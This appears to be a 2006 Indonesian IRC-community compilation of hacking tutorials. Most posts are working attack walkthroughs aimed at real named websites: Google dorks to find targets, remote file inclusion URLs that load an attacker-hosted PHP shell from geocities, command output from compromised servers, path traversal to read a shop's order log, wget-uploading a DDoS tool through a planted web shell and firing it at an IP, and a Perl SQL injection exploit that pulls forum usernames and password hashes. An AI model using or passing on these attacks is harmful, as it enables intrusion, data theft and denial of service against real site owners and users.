Solo Hacker Link 08
Transcript of Solo Hacker Link 08
TUTORIAL HACKINGKOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet
8Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago-ChanServ- Successor: POM_PONK << ONLINE >>-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)-ChanServ- Last Used: 0 seconds ago-ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]Selamat Menunaikan Ibadah Syaum
-ChanServ- Email: [email protected] Url: www.solohackerlink.s.to atau www.solohackerlink.cool.to
-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose-ChanServ- Mode Lock: -i
CoolMenus Event Remote File Include Vulnerability.
CoolMenus Event Remote File Include Vulnerability.
by:POM_PONK
Bagaimana dengan kabar teman-teman semua,masih mau membaca tulisan papi???
Kalo masih sempat silahkan meluangkan waktu sejenak dan -
pahami bahasan pada pertemuan kali ini.
Disini akan papi tulis bagaimana memanfaatkan kelemahan pada:
"/event/index.php?page="
Bagi teman-teman yang sudah bisa silahkan berikan masukan pada papi.
Okay....!!! langsung pada pembahasan....
Silahkan anda semua buka www.google.com
Dan berikan keyword/kata kunci sebagai berikut:
"/event/index.php?page=" site:.net
atau langsung klik URl dibawah ini
http://www.google.co.id/search?hl=id&q=%22%2Fevent%2Findex.php%3
Fpage%3D%22+site%3A.net&meta=
Nah..... banyak banget target yang keluar.
Apakah semua target itu masih bisa kita inject,
Silahkan anda coba satu persatu.
Tapi ingat harus sabar dan ulet.
Sebentar dulu... papi mau nyalain rokok "Djarum super" dulu...
Biar otak papi encer dan tidak mengantuk.
Pussssss...... Gerrr Dag... Juhhhhhhhhhh
MantaB!!!!!!
Ini dia salah satu target yang papi pilih dari hasil pencarian.
www.meinbeardie.net/event/index.php?page=artmedic_event1
Konsepnya begini : www.meinbeardie.net/[path]/
event/index.php?page=scriptcode.txt?&cmd=uname -a
Setelah itu kita siapkan scripts injectnya
Silahkan di ambil source code yang telah papi siapkan
www.geocities.com/solohackerlinks/script/pomponk.txt
Langkah berikutnya adalah menggabungkan antara target dengan scripts injectnya
lihat contoh berikut ini:
www.meinbeardie.net/event/index.php?page=http://geocities.com/solohackerlinks/script/
pomponk.txt?&cmd=
Setekah tambahin command Unix,jadinya seperti dibawah ini
www.meinbeardie.net/event/index.php?page=http://geocities.com/solohackerlinks/script/
pomponk.txt?&cmd=ls -a
.
..
admin.php
albums
backend.php
banners.php
cgi-bin
config-old.php
config.php
cp
docs
error.php
files
footer.php
groupware
header.php
.htaccess
images
includes
index-backup.php
index.php
install
install.php
javascript
lang
language
lifesciences
mailgust
mainfile.php
modules
modules.php
newsletter
pagedbackend.php
pkk
pnadodb
pntables.php
pnTemp
print.php
referer.php
robots.txt
smslorg_maindb
test.sql
themes
uploads
user.php
webalizer
web alizer
xmlrpc.php
Itukan isinya banyak banget ...... silah anda lanjutkan sendiri.
sampai disini dulu papi mengetik... sudah terlalu capek neeeh...
Dan jangan lupa kalau dapet shell bagi-bagi sama papi ya....
Thank´s buat teman-teman #solohackerlink semuanya.
by:POM_PONK aka STIAWAN
#SOLOHACKERLINK ALLNET&DALNET
Tulislah Apa Yang Kamu Kerjakan
Post by : POM_PONK on [ 01 May 2006 18:17:01 ]
DDOS LEWAT PHPSHELL
DDOS LEWAT PHPSHELL
Layanan IP dan TCP yang bekerja di mesin anda adalah termasuk salah satu
celah yang memikat untuk melancarkan serangan DDOS.
Disini papi mau menulis bagaimana memasang senjata buat DDOS.
Tapi ingat jangan sampai disalah gunakan,karena sangat berbahaya.
Terutama jangan buat DDOS warnet karena papi sendiri kerja diwarnet,
Benar-benar nggak enak kalau lagi user ramai eh tau-tau putus karena kena DDOS.
Langsung saja pada pembahasan kali ini papi asumsikan anda semua sudah tahu,
Bagaimana mencari target yang bisa dipasangi PHPSHELL.
Bagi yang belum mengerti silahkan anda baca pada “OLDDATABASE”
Disana sudah banyak tulisan/tutorial yang membahasnya.
Papi ambil contoh dari salah satu target yang telah papi siapkan
http://www.gotvape.com/test/.pomponk/phphsell.php
(Contoh web yang sudah terpasang phpshell)
Langkah selanjutnya kita upload senjatanya.
http://www.chrisandkristy.com/galbum/.gallery/vadim
Sekarang kita upload dengan menggunakan command wget.
Gambar PHPSHELL yang akan ditanami senjata(vadim)
Selanjutnya kita lihat apakah senjata/Vadim yang kita upload sudah masuk!!!
Ketikkan command ls –a
total 92
drwxrwxrwx 2 wwwuser www 4096 Apr 30 11:25 .
drwxr-x--x 67 wwwuser www 8192 Apr 30 11:23 ..
-rwxrwxrwx 1 wwwuser www 64973 Dec 4 23:43 index.html
-rw-r--r-- 1 wwwuser www 5686 Aug 24 2005 phpshell.php
-rw-r--r-- 1 wwwuser www 6114 Jul 28 2005 vadim
Nah… ternyata kita berhasil memasukkan senjata/vadim
Kemudian kita kasih command CHMOD
Ketik begini chmod 755 Vadim
Setelah itu anda bisa menggunakannya dengan perintah begini:
./vadim ip port (./vadim 206.xxx.xxx.xxx 53)
Dan lihatlah apa yang akan terjadi hehehehehe……..
Sampai disini dulu tulisan/tutorial ini papi buat, Mudah-mudahan kita bertemu ditulisan
yang akan datang.
Catatan penting : Penulis tidak bertanggung jawab atas semua resiko yang anda perbuat,
Karena tulisan ini hanya untuk pengetahuan saja.OK!!!
Terima kasih buat Saleho aka PeNcOpEt_CiNtA dan teman-teman
#SOLOHACKERLINK
POM_PONK aka STIAWAN
#SOLOHACKERLINK Allnet&Dalnet
(Tulislah apa yang kamu kerjakan)
Post by : POM_PONK on [ 30 April 2006 15:49:36 ]
Bugs Aardvark Topsites PHP 4.2.2
Aardvark Topsites PHP 4.2.2 remote file inclusion --> original take from milw0rm
keyword :
"Powered By Aardvark Topsites PHP 4.2.2"
"alliniurl:/topsite"
Exploit: /sources/join.php?FORM[url =owned&CONFIG[captcha]=1&CONFIG[path]
=injekan
exmple :
http://www.miniaturewargaming.com/topsites/sources/join.php?FORM[url]
=owned&CONFIG[captcha]=1&CONFIG[path]
=http://geocities.com/bnkc2006/hack/r57.txt?
Good Luck
Post by : pinguingilo on [ 30 April 2006 10:53:35 ]
My Gaming Ladder Combo System stats.php dir[base]
Variable Remote File Inclusion
My Gaming Ladder Combo System stats.php dir[base] Variable Remote File Inclusion
Hello !!!! Friend..!!!!
saleho aka PeNcOpEt_CiNtA back
kali ini babahe saleho ingin share ilmu ttg hacking
pembahasan kali ini seputar bug yang telah di publish pada tanggal 24 April 2006
(termasuk bug agak baru) yang terjadi pada My Gaming Ladder Combo System stats.php
dir[base] Variable Remote File Inclusion
dimana pada file stats.php dapat kita kasih input dengan variabel ´dir[base]´
adapun konsep hackingnya begini
http://[webtarget]/[LadderPath]/stats.php?dir[func]=&dir[base]=inject kamu
dimana kita bisa mengeksekusi perintah dengan script yang telah kita buat.
OK....tidak usah banak basa basi..kita lanjutkan permainan kita. OK..coy...!!!!
pertama kita cari target. seperti biasa kita buka search engine kesayangan kita
www.google.com
ketikkan keywordnya :
allinurl:stats.php "ladder"
inurl:stats.php "ladder"
inurl:ladder filetype:php + "stats"
misalnya teman-teman mendapat target seperti berikut :
cyberconxion.temp.powweb.com/ ladder/stats.php?action=playerdb
selanjutnya kita aplikasikan konsep hack dari Ladder combo System tersebut yang kurang
lebih seperti berikut :
http://cyberconxion.temp.powweb.com/ladder/stats.php?dir[func]=&dir[base]
=http://geocities.com/gen_tho2002/salehor.txt?
kemudian teman-teman perhatikan di browser setelah memberikan input diatas apa yang
terjadi ???
uname -a : FreeBSD clust08-www05.powweb.com 4.11-RELEASE FreeBSD 4.11-
RELEASE #0: Thu May 19 18:34:41 PDT 2005 [email protected]
sysctl :
$OSTYPE :
Server : Apache/1.3.34 (Unix) FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7d
PowWeb/1.1
id : uid=158768(cyberconxion) gid=500(customer) groups=500(customer)
pwd : /www/c/cyberconxion/htdocs/ladder/functions
ls -lia
total 2280
35008842 drwxr-xr-x 3 cyberconxion customer 4096 Apr 27 12:58 .
37997781 drwxr-xr-x 5 cyberconxion customer 4096 Apr 26 17:06 ..
36888082 -rwxr-xr-x 1 cyberconxion customer 7248 Oct 5 2005 WS_FTP.LOG
35008843 -rwxr-xr-x 1 cyberconxion customer 6530 Apr 24 17:36 addmember.php
35008844 -rwxr-xr-x 1 cyberconxion customer 11741 Apr 24 17:36 admin.php
35008845 -rwxr-xr-x 1 cyberconxion customer 7643 Apr 24 17:36 admin_addstaff.php
35008846 -rwxr-xr-x 1 cyberconxion customer 14852 Apr 24 17:36 admin_ban.php
35008847 -rwxr-xr-x 1 cyberconxion customer 5022 Apr 24 17:36 admin_challenge.php
16647897 -rwxr-xr-x 1 cyberconxion customer 16849 Apr 24 17:36
admin_comments.php
16647898 -rwxr-xr-x 1 cyberconxion customer 6262 Apr 24 17:36 admin_createteam.php
16647899 -rwxr-xr-x 1 cyberconxion customer 19065 Apr 24 17:36
admin_editplayer.php
16647900 -rwxr-xr-x 1 cyberconxion customer 12392 Apr 24 17:37 admin_editstaff.php
16647901 -rwxr-xr-x 1 cyberconxion customer 29107 Apr 24 17:37 admin_editteam.php
16647902 -rwxr-xr-x 1 cyberconxion customer 970 Apr 24 17:37
admin_finishmessage.php
16647903 -rwxr-xr-x 1 cyberconxion customer 10779 Apr 24 17:37 admin_games.php
16647904 -rwxr-xr-x 1 cyberconxion customer 86047 Apr 24 17:37 admin_ladders.php
16647905 -rwxr-xr-x 1 cyberconxion customer 8511 Apr 24 17:37
admin_linkmanager.php
16647906 -rwxr-xr-x 1 cyberconxion customer 12155 Apr 24 17:37 admin_maps.php
16647907 -rwxr-xr-x 1 cyberconxion customer 10351 Apr 24 17:37 admin_match.php
16647908 -rwxr-xr-x 1 cyberconxion customer 12015 Apr 24 17:37 admin_news.php
16647909 -rwxr-xr-x 1 cyberconxion customer 12566 Apr 24 17:37
admin_reportmatch.php
16647910 -rwxr-xr-x 1 cyberconxion customer 10760 Apr 24 17:37 admin_rules.php
16647911 -rwxr-xr-x 1 cyberconxion customer 47871 Apr 24 17:37
admin_tournament.php
16647912 -rwxr-xr-x 1 cyberconxion customer 4672 Apr 24 17:37 admin_validate.php
61881317 -rwxr-xr-x 1 cyberconxion customer 600 Apr 24 17:37 banner.php
16647917 -rwxr-xr-x 1 cyberconxion customer 20112 Apr 24 17:37 challenge.php
39912411 -rwxr-xr-x 1 cyberconxion customer 11780 Apr 24 17:37 challengefinalize.php
39912414 -rwxr-xr-x 1 cyberconxion customer 7814 Apr 24 17:37 challengeforfeit.php
39912415 -rwxr-xr-x 1 cyberconxion customer 13002 Apr 24 17:37
challengerespond.php
39912416 -rwxr-xr-x 1 cyberconxion customer 20161 Apr 24 17:37 checkdata.php
39912417 -rwxr-xr-x 1 cyberconxion customer 29291 Apr 24 17:37 confirmwin.php
35306905 -rwxr-xr-x 1 cyberconxion customer 30526 Apr 24 17:37 editplayer.php
35306906 -rwxr-xr-x 1 cyberconxion customer 6677 Apr 24 17:37 editteam.php
35306911 -rwxr-xr-x 1 cyberconxion customer 1960 Apr 24 17:37 email.php
31408398 -rwxr-xr-x 1 cyberconxion customer 2429 Apr 24 17:37 email_headers.php
61881318 -rwxr-xr-x 1 cyberconxion customer 594 Apr 24 17:37 error.php
31408401 -rwxr-xr-x 1 cyberconxion customer 743 Apr 24 17:37 finishmessage.php
61881319 -rwxr-xr-x 1 cyberconxion customer 1641 Apr 24 17:37 global.php
37790062 -rwxr-xr-x 1 cyberconxion customer 19273 Apr 22 17:24 horde.log
78248353 -rwxr-xr-x 1 cyberconxion customer 1084 Apr 26 15:36 index.html
31408405 -rwxr-xr-x 1 cyberconxion customer 8704 Apr 24 17:37 invitemember.php
31408406 -rwxr-xr-x 1 cyberconxion customer 4326 Apr 24 17:37 leaveteam.php
31408407 -rwxr-xr-x 1 cyberconxion customer 19164 Apr 24 17:37 loginforms.php
31408408 -rwxr-xr-x 1 cyberconxion customer 37825 Apr 24 17:37 loginsec.php
31408409 -rwxr-xr-x 1 cyberconxion customer 6550 Apr 24 17:37 manageteam.php
31408410 -rwxr-xr-x 1 cyberconxion customer 6505 Apr 24 17:37 matchdb.php
31408411 -rwxr-xr-x 1 cyberconxion customer 29907 Apr 24 17:37 newplayer.php
54839269 -rwxr-xr-x 1 cyberconxion customer 162496 Apr 25 06:42 nuwse.php
31408412 -rwxr-xr-x 1 cyberconxion customer 9073 Apr 24 17:37 playerdb.php
31408413 -rwxr-xr-x 1 cyberconxion customer 8435 Apr 24 17:37 players.php
31408414 -rwxr-xr-x 1 cyberconxion customer 2001 Apr 24 17:37 rankadjust.php
31408415 -rwxr-xr-x 1 cyberconxion customer 23366 Apr 24 17:37 reportloss.php
31408416 -rwxr-xr-x 1 cyberconxion customer 37797 Apr 24 17:37 secured.php
31408417 -rwxr-xr-x 1 cyberconxion customer 1662 Apr 24 17:37 sessions.php
75697587 -rwxr-xr-x 1 cyberconxion customer 87615 Dec 19 05:15 shel.php
31408418 -rwxr-xr-x 1 cyberconxion customer 8443 Apr 24 17:37 showchallenge.php
49104511 -rwxr-xr-x 1 cyberconxion customer 8407 Apr 24 17:37 showmatch.php
36888077 -rwxr-xr-x 1 cyberconxion customer 5974 Apr 24 17:37 siteblocks.php
61881320 -rwxr-xr-x 1 cyberconxion customer 2778 Apr 24 17:37 stats.php
36888079 -rwxr-xr-x 1 cyberconxion customer 7657 Apr 24 17:37 teamdb.php
36888080 -rwxr-xr-x 1 cyberconxion customer 1595 Apr 24 17:37 userstats.php
36888081 -rwxr-xr-x 1 cyberconxion customer 6505 Apr 24 17:37 validate.php
75480010 drwxr-xr-x 2 cyberconxion customer 4096 Apr 23 18:39 vhost
tuh kan....apa saleho bilang...hehehhehehe.
temen-temen dapat memberikan perintah unix untuk mengaploud,merename, mengedit
file,dan lain-lain
di tempat yang telah disediakan, tapi ingat !!! jangan merusak usahakan untuk
memberitahu kepada
admin agar segera memperbaiki websitenya.
Ok..sekian dulu yah..itu hanya sekedar salah satu contoh target. babahe udah capek nih
sekali browsing dapet target tersebut, ya..udah babahe buat artikel sekalian aja
hehehehheh
Babahe pamit....mo nulis buku dulu heheheh
salam all viva to SolohackerlinkCrew
salam
saleho aka PeNcOpEt_CiNtA
Post by : PeNcOpEt_CiNtA on [ 27 April 2006 20:20:20 ]
nambah - nambah berita ( BUG LAMA )
mungkin untuk om2 yang jago carding udah tahu bug yang ini, ini cuma untuk teman2pemula aja pertama cari di google allinurl:/cgi-bin/store/index.cgi?page= contoh yang didapat dari google www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=Returns%20and%20Guarantees.htm&cart_id=5745716
buka link yang ditemukan seperti diatas kemudian ganti/isikan dibelakang = menjadi../admin/files/order.log sehingga menjadi www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=../admin/files/order.log sekian terima kasih
Post by : d3bug on [ 26 April 2006 04:24:47 ] 203.130.206.114
Php Myagenda
key >> intitle:phpmyagenda
injek >> agenda.php3?rootagenda=http://injek.org/injek.txt?
contoh : http://www.clme94.org/phpmyagenda/agenda.php3?rootagenda=http://injek.org/injek.txt?
Post by : pinguingilo on [ 26 April 2006 02:42:29 ]
rimot eskiel injeksien
#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
# 1- First Do Login
# 2- View This Link :D
#
# index.php?page=showprofile&id=-1´ UNION ALL SELECT%
201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM
flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
# Div The PHP Security Fucking Tool :D
##-- Start --#
$host = "127.0.0.1";
$path = "/flexbb/";
$injec = "-1´%20UNION%20ALL%20SELECT%
201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%
20flexbb_users%20WHERE%20id=1/*";
##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# FlexBB Dir On Server | exm. /flexbb/
#
# $mycookie :-
# Your Login Info To Forum * Not The Real Password || The Hashed One *
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1 ";
$evildata .= "Host: $host ";
$evildata .= "Accept: */* ";
$evildata .= "Keep-Alive: 300 ";
$evildata .= "Connection: keep-alive ";
print $sock $evildata;
while($ans = <$sock>){
$usr_newans = $ans;
$pwd_newans = $ans;
#print $newans;
$usr_newans =~ m/<title>FlexBB - Viewing Profile: (.*?)</title>/ && print "[+]
Username is :- ".$1." ";
$pwd_newans =~ m/<a href="2" target="_blank">(.*?)</a>/ && print "[+] Password is :-
".$1." ";
}
# milw0rm.com [2006-04-24]
Post by : ___tar_gz on [ 25 April 2006 17:51:46 ]
Cara Inject MAMBO versi POM_PONK
Cara Inject MAMBO
Disini akan papi terangkan bagaimana menjebol website yang menggunakan mambo.
Langkah yang harus dipersiapkan adalah komputer yang terhubung internet dan buka web
search kesayangan kita. Papi ambil google.com
setelah itu masukkan kata kunci “Buletin/index.php” site:.com (atau kreasi teman2
sendiri)
nah munculkan di list google..... sekarang ambil salah satu target
misal targetna kek gini
http://sulistiawan.sorry.to/Buletin/index.php?option=com_content&task=view&id=17&It
emid=3
Setelah itu buang option=com_content&task=view&id=17&Itemid=3
Sehingga menjadi http://sulistiawan.sorry.to/Buletin/index.php?
Nah.... kalau dah begini kita sisipin bug di belakangna.
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]
=1&GLOBALS=&mosConfig_absolute_path=
sehabis kita tambahin menjadi kek ini
http://sulistiawan.sorry.to/Buletin/index.php?_REQUEST=&_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
Kalo dah gini tinggal kita tambahin scripts injectna.
Ini adalah scriptna : http://geocities.com/solohackerlinks/script/pomponk.txt
Jadi kita gabung menjadi begini
http://sulistiawan.sorry.to/Buletin/index.php?_REQUEST=&_REQUEST[option]
=com_content&_REQUEST[Itemid]
=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/solohackerlinks/script
/pomponk.txt?
Kalo berhasil maka akan keluar halam yang ada kolom buat masukin command unix.
Silahkan ketikkan command2 linux dan cari directory yang permisionna kebuka.
Contoh commandna:
-id
-uname -a
-find -perm 777
dan lain sebagainya.
Lebih lanjut silahkan di otak-atik sendiri ya....
Demikian tutorial ini papi buat terima kasih buat teman2 yang telah ngasih kritikan dan
makian di “BUKU TAMU” hehehhe.
POM_PONK aka STIAWAN
Post by : POM_PONK on [ 24 April 2006 19:56:25 ]
Mambo 4.5.1 Vulnerability
setelah mendapat masukan dari teman-teman yang ingin mengetahui teknik hacking
mambo
pada kesempatann ini saya ingin berbagi tip dan trik kepada teman-teman semua
walaupun
teknik ini agak basi :) tapi buat para pemula ini sangat cocok untuk pengetahuan.
seperti yang telah kita lihat sekarang ini, banyak sekali website yang menggunakan CMS
diantaranya dengan menggunakan Mambo dan tanpa disadari bahwa suatu sistem mambo
tersebut
terdapat kelemahannya yakni pada versi 4.5.1 seperti yang dipakai pada salah astu situs
ITB waktu yang lalu.
OK...tidak usah panjang lebar kita mulai..
pertama..buka situs kesayangan kita tentunya www.google.com
kemudian berikan keywordnya
allinur:index2.php?option=
inurl:mambo/index.php
inurl:cms/index.php
powered by mambo 4.5.1
atau teman-teman yang mempunyai kata kunci yang lebih spesifik itu lebih baik.
adapun konsep hackingnya sebagai berikut
www.target.com/index.php?_REQUEST=&_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=inject
kamu
sebagai contoh teman-teman mendapat target seperti berikut :
www.ipoms.or.id/mambo/index.php?option=com_
content&task=view&id=480&Itemid=25
nah..berikan script inject kamu di belakang index.php
sehingga menjadi begini
http://www.ipoms.or.id/mambo/index.php?_REQUEST=&_REQUEST[option]
=com_content&_REQUEST[Itemid]
=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/gen_tho2002/salehor.t
xt?
coba perhatikan apa yang terjadi setelah di beri inject terssebut
uname -a : FreeBSD tiger.indonesiahost.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
Sat Mar 4 18:16:38 EST 2006 [email protected]
sysctl :
$OSTYPE :
Server : Apache/2.0.54 (Unix) mod_perl/1.99_17 Perl/v5.8.7 mod_ssl/2.0.54
OpenSSL/0.9.7d FrontPage/5.0.2.2635 PHP/4.4.2 mod_webap
id : user=ipoms uid=10163 gid=10001
pwd : /usr/local/psa/home/vhosts/ipoms.or.id/httpdocs/mambo
15430776 drwxr-xr-x 14 ipoms psacln 1024 16.06.2005 23:08 administrator
15450471 drwxr-xr-x 2 ipoms psacln 512 25.06.2005 17:50 cache
15450476 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 classes
15450487 drwxr-xr-x 24 ipoms psacln 1024 22.12.2005 17:38 components
15450973 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 dmdocuments
15450976 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 documentation
15450981 drwxr-xr-x 3 ipoms psacln 1024 20.12.2005 23:29 downloads
15451009 drwxr-xr-x 5 ipoms psacln 512 16.06.2005 10:46 editor
15451244 drwxr-xr-x 3 ipoms psacln 2048 16.06.2005 13:23 help
15451307 drwxr-xr-x 8 ipoms psacln 512 22.12.2005 10:51 images
15451678 drwxr-xr-x 10 ipoms psacln 1024 29.12.2005 05:15 includes
15451926 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 language
15451931 drwxr-xr-x 6 ipoms psacln 512 17.06.2005 00:05 mambots
15452148 drwxr-xr-x 2 ipoms psacln 512 22.12.2005 17:38 media
15452152 drwxr-xr-x 5 ipoms psacln 2048 22.12.2005 11:35 modules
15452355 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 sql
15452370 drwxr-xr-x 14 ipoms psacln 512 22.12.2005 12:05 templates
15452785 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 tmp
15452786 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 uploadfiles
15431244 -rw-r--r-- 1 ipoms psacln 23872 17.06.2005 00:17 CHANGELOG
15431245 -rw-r--r-- 1 ipoms psacln 2665 29.12.2005 07:24 configuration.php
15431246 -rw-r--r-- 1 ipoms psacln 3752 17.06.2005 00:17 configuration.php-dist
15431247 -rw-r--r-- 1 ipoms psacln 1269 17.06.2005 00:15 globals.php
15431248 -rw-r--r-- 1 ipoms psacln 580 17.06.2005 00:17 htaccess.txt
15431249 -rw-r--r-- 1 ipoms psacln 5332 17.06.2005 00:17 index.php
15431250 -rw-r--r-- 1 ipoms psacln 3365 17.06.2005 00:17 index2.php
15431251 -rw-r--r-- 1 ipoms psacln 453 17.06.2005 00:17 mainbody.php
15431252 -rw-r--r-- 1 ipoms psacln 2005 17.06.2005 00:17 offline.php
15431253 -rw-r--r-- 1 ipoms psacln 451 17.06.2005 00:17 pathway.php
15431254 -rw-r--r-- 1 ipoms psacln 286 17.06.2005 00:17 robots.txt
15431255 -rw-r--r-- 1 ipoms psacln 682 06.07.2004 17:44 version.php
15431256 -rw-r--r-- 1 ipoms psacln 3859 17.06.2005 00:17 INSTALL
15431257 -rw-r--r-- 1 ipoms psacln 18317 17.06.2005 00:17 LICENSE
itu hanya sebagai contoh... teman-teman dapat mencari target yang lain
anda dapat menggunakan command linux untuk membuat perintah seperti aploud, create,
dan lain-lain.
OK...sekidan dulu tapi ingat jangan dirusak kasihann adminnya susah2 buat webnya
hehehehehehee
jagnan di pasang backdoor OK...coy !!!!!
salam
saleho aka PeNcOpEt_CiNtA
Post by : PeNcOpEt_CiNtA on [ 24 April 2006 19:49:39 ]
Cara Mencari MP3 Dengan Google.com
Cara Mencari MP3 Dengan Google.com by:POM_PONK
www.google.com adalah web search paling canggih sampai sekarang ini, dengan google
kita bisa mencari
artikel,tutorial,gambar,video,mp3 dan lain sebagainya.
Sebenarnya ada beberapa server IRC yang menyediakan MP3 seperti irc.nullus.net:6667
channel #indomp3 #mp3
Tapi kadang kita bosen nunggu giliran dan belum lagi kalau bot yang tugasnya mengirip
file tau-tau mati.
Mari kita mulai berjelajah dengan mencari string spesifik seperti: mp3 , "index of","last
modified","parent of" dan sebagainya
String tersebut merupakan string yang biasa kita jumpai pada sebuah Directory Listing di
web server .
Directory Listing adalah fitur dari web server yang dapat menampilkan isi sebuah
direktori .
Contohnya seperti di sini .
Jadi sebenarnya kita akan mencari Directory Listing yang berisikan file2 MP3 .
Kita akan mencoba membahas bagaimana cara mencari dan menggunakan trik Directory
Listing karena merupakan cara paling umum
digunakan saat ini dan hasilnya cukup bagus.
my_haz_runs di page-nya memberikan 3 format umum yang biasa digunakan dalam
pencarian yaitu :
Type 1 : [Directory String] + (intitle:)[file type] + [mp3 name]
Type 2 : [Directory String] + (inurl:)[file type] + [mp3 name]
Type 3 : [Directory String] + [file type] + [mp3 name] + [limitors]
[Directory String] merupakan string spesifik yang biasa kita jumpai di awal list .
Ada beberapa yang bisa digunakan seperti : "index of","last modified","parent of" .
(inurl) (intitle) : operator pencarian di Google . Kegunaannya dapat dibaca di sini
[file type] adalah jenis file yang akan kita cari .
Direpresentasikan dalam format ekstensi dari file tersebut . Misalnya : MP3 , WMA ,
OGG dsb
[mp3 name] adalah nama file yang akan kita cari . Tidak perlu komplit .
Cukup string tertentu saja yang kira kira unik dan terdapat dalam nama file yang akan kita
cari .
Jadi bisa berupa potongan nama lagu atau nama artisnya .
Misalnya : "Underoath" , "When The Sun Sleep", dll
"limitors" digunakan untuk menyaring result yang kita inginkan dari page yang tidak
diharapkan .
Karena biasanya directory listing ini adalah sebuah direktori alias tidak ada ekstensi maka
kita harus menyaring result yang
memiliki ekstensi umum seperti html , php , htm , asp , jsp dan sebagainya .
Kita akan mencoba mencari file MP3 dari band yang kita inginkan , Underoath . String
pencariannya adalah :
"index of" + "mp3" + "Underoath" -html -htm -php
Query tersebut memberikan hasil yang lumayan akurat , salah satunya adalah ini . Jika
kita explore ,
di link tersebut memang ada satu file MP3 dengan Band Underoath
Lalu bagaimana jika kita ingin mendapatkan kumpulan MP3 dari seorang artis saja ,
misalnya Ari lasso .
Gampang ! gunakan saja operator inurl , misalnya inurl:"ari lasso"
akan memberikan result dimana URL-nya terdapat string "ari lasso"
index of" + "mp3" + inurl:"ari lasso" -html -htm -php
Beberapa hasil pencarian mungkin sudah invalid sehingga tidak bisa bisa diakses lagi .
Bagaimana mensiasatinya ??
Gampang doms!!! setiap file di direktori memiliki timestamp yang menunjukkan kapan
terakhir file diupload .
Tinggal kita tambahkan saja string timestamp untuk memperbaiki hasil pencarian .
Di kasus pencarian Ari lasso , sebenarnya saya juga mengalami kendala mendapatkan
hasil yang valid krn sebagian besar sudah
invalid .
Tapi setelah trik "timestamp" ini ditambahkan .. hohohoho...didapat beberapa direktori
yang khusus untuk menyimpan MP3 dari
Ari lasso . Querynya seperti ini
index of" + "mp3" + "2006" + inurl:"Ari lasso" -html -htm -php
Dapat dilihat saya menambahkan angka 2006 sebagai penunjuk bahwa saya
menginginkan hasil terbaru yaitu file yang memiliki
timestamp tahun 2006 . Tanggal dan bulan bisa juga digunakan asal kita tahu formatnya .
Sampai disini dulu tulisan ini aku buat moga temen2 tidak bingung lagi dalam mencari
file2 yang di inginkan
Terima kasih buat PeNcOpEt_CiNtA aka saleho yang telah ngasih tutorial tentang
"GOOGLE HACKING"
POM_PONK aka STIAWAN
Post by : POM_PONK on [ 24 April 2006 18:46:05 ]
Shell geratis POM_PONK aka SULISTYAWAN
Buat teman-teman yang baru dan pengen belajar menggunakan command linux
silahkan mendaftar di website penyedia shell geratis.
Berikut ini daftar websitenya:
Free.Net.Pl (Polish server) - http://www.free.net.pl/
XOX.pl (Polish server) - http://www.xox.pl/
IProtection - http://www.iprotection.com/
CORONUS - http://www.coronus.com/
ODD.org - http://www.odd.org/
MARMOSET - http://www.marmoset.net/
flame.org - http://www.flame.org/
freeshells - http://freeshells.net.pk/
LinuxShell - http://www.linuxshell.org/
SDF (freeshell.org) - http://sdf.lonestar.org/
GREX (cyberspace.org) - http://www.grex.org/
NYX - http://www.nxy.net/
ShellYeah - http://www.shellyeah.org/
HOBBITON.org - http://www.hobbiton.org/
FreeShells - http://www.freeshells.net/
DucTape - http://www.ductape.net/
takiweb - http://www.takiweb.com/
FreePort - http://freeport.xenos.net/
FreedomShell.com - http://www.freedomshell.com/
LuxAdmin - http://www.luxadmin.org/
shellweb - http://shellweb.net/
blekko - http://blekko.net/
BSDSHELL - http://free.bsdshell.net/
ROOTshell.be - http://www.rootshell.be/
shellasylum.com - http://www.shellasylum.com/
Daforest - http://www.daforest.org/
yaa lumayan lah buat belajar hehehhehe
selamat mencoba dan belajar.....
POM_PONK
Post by : POM_PONK on [ 15 April 2006 18:31:32 ]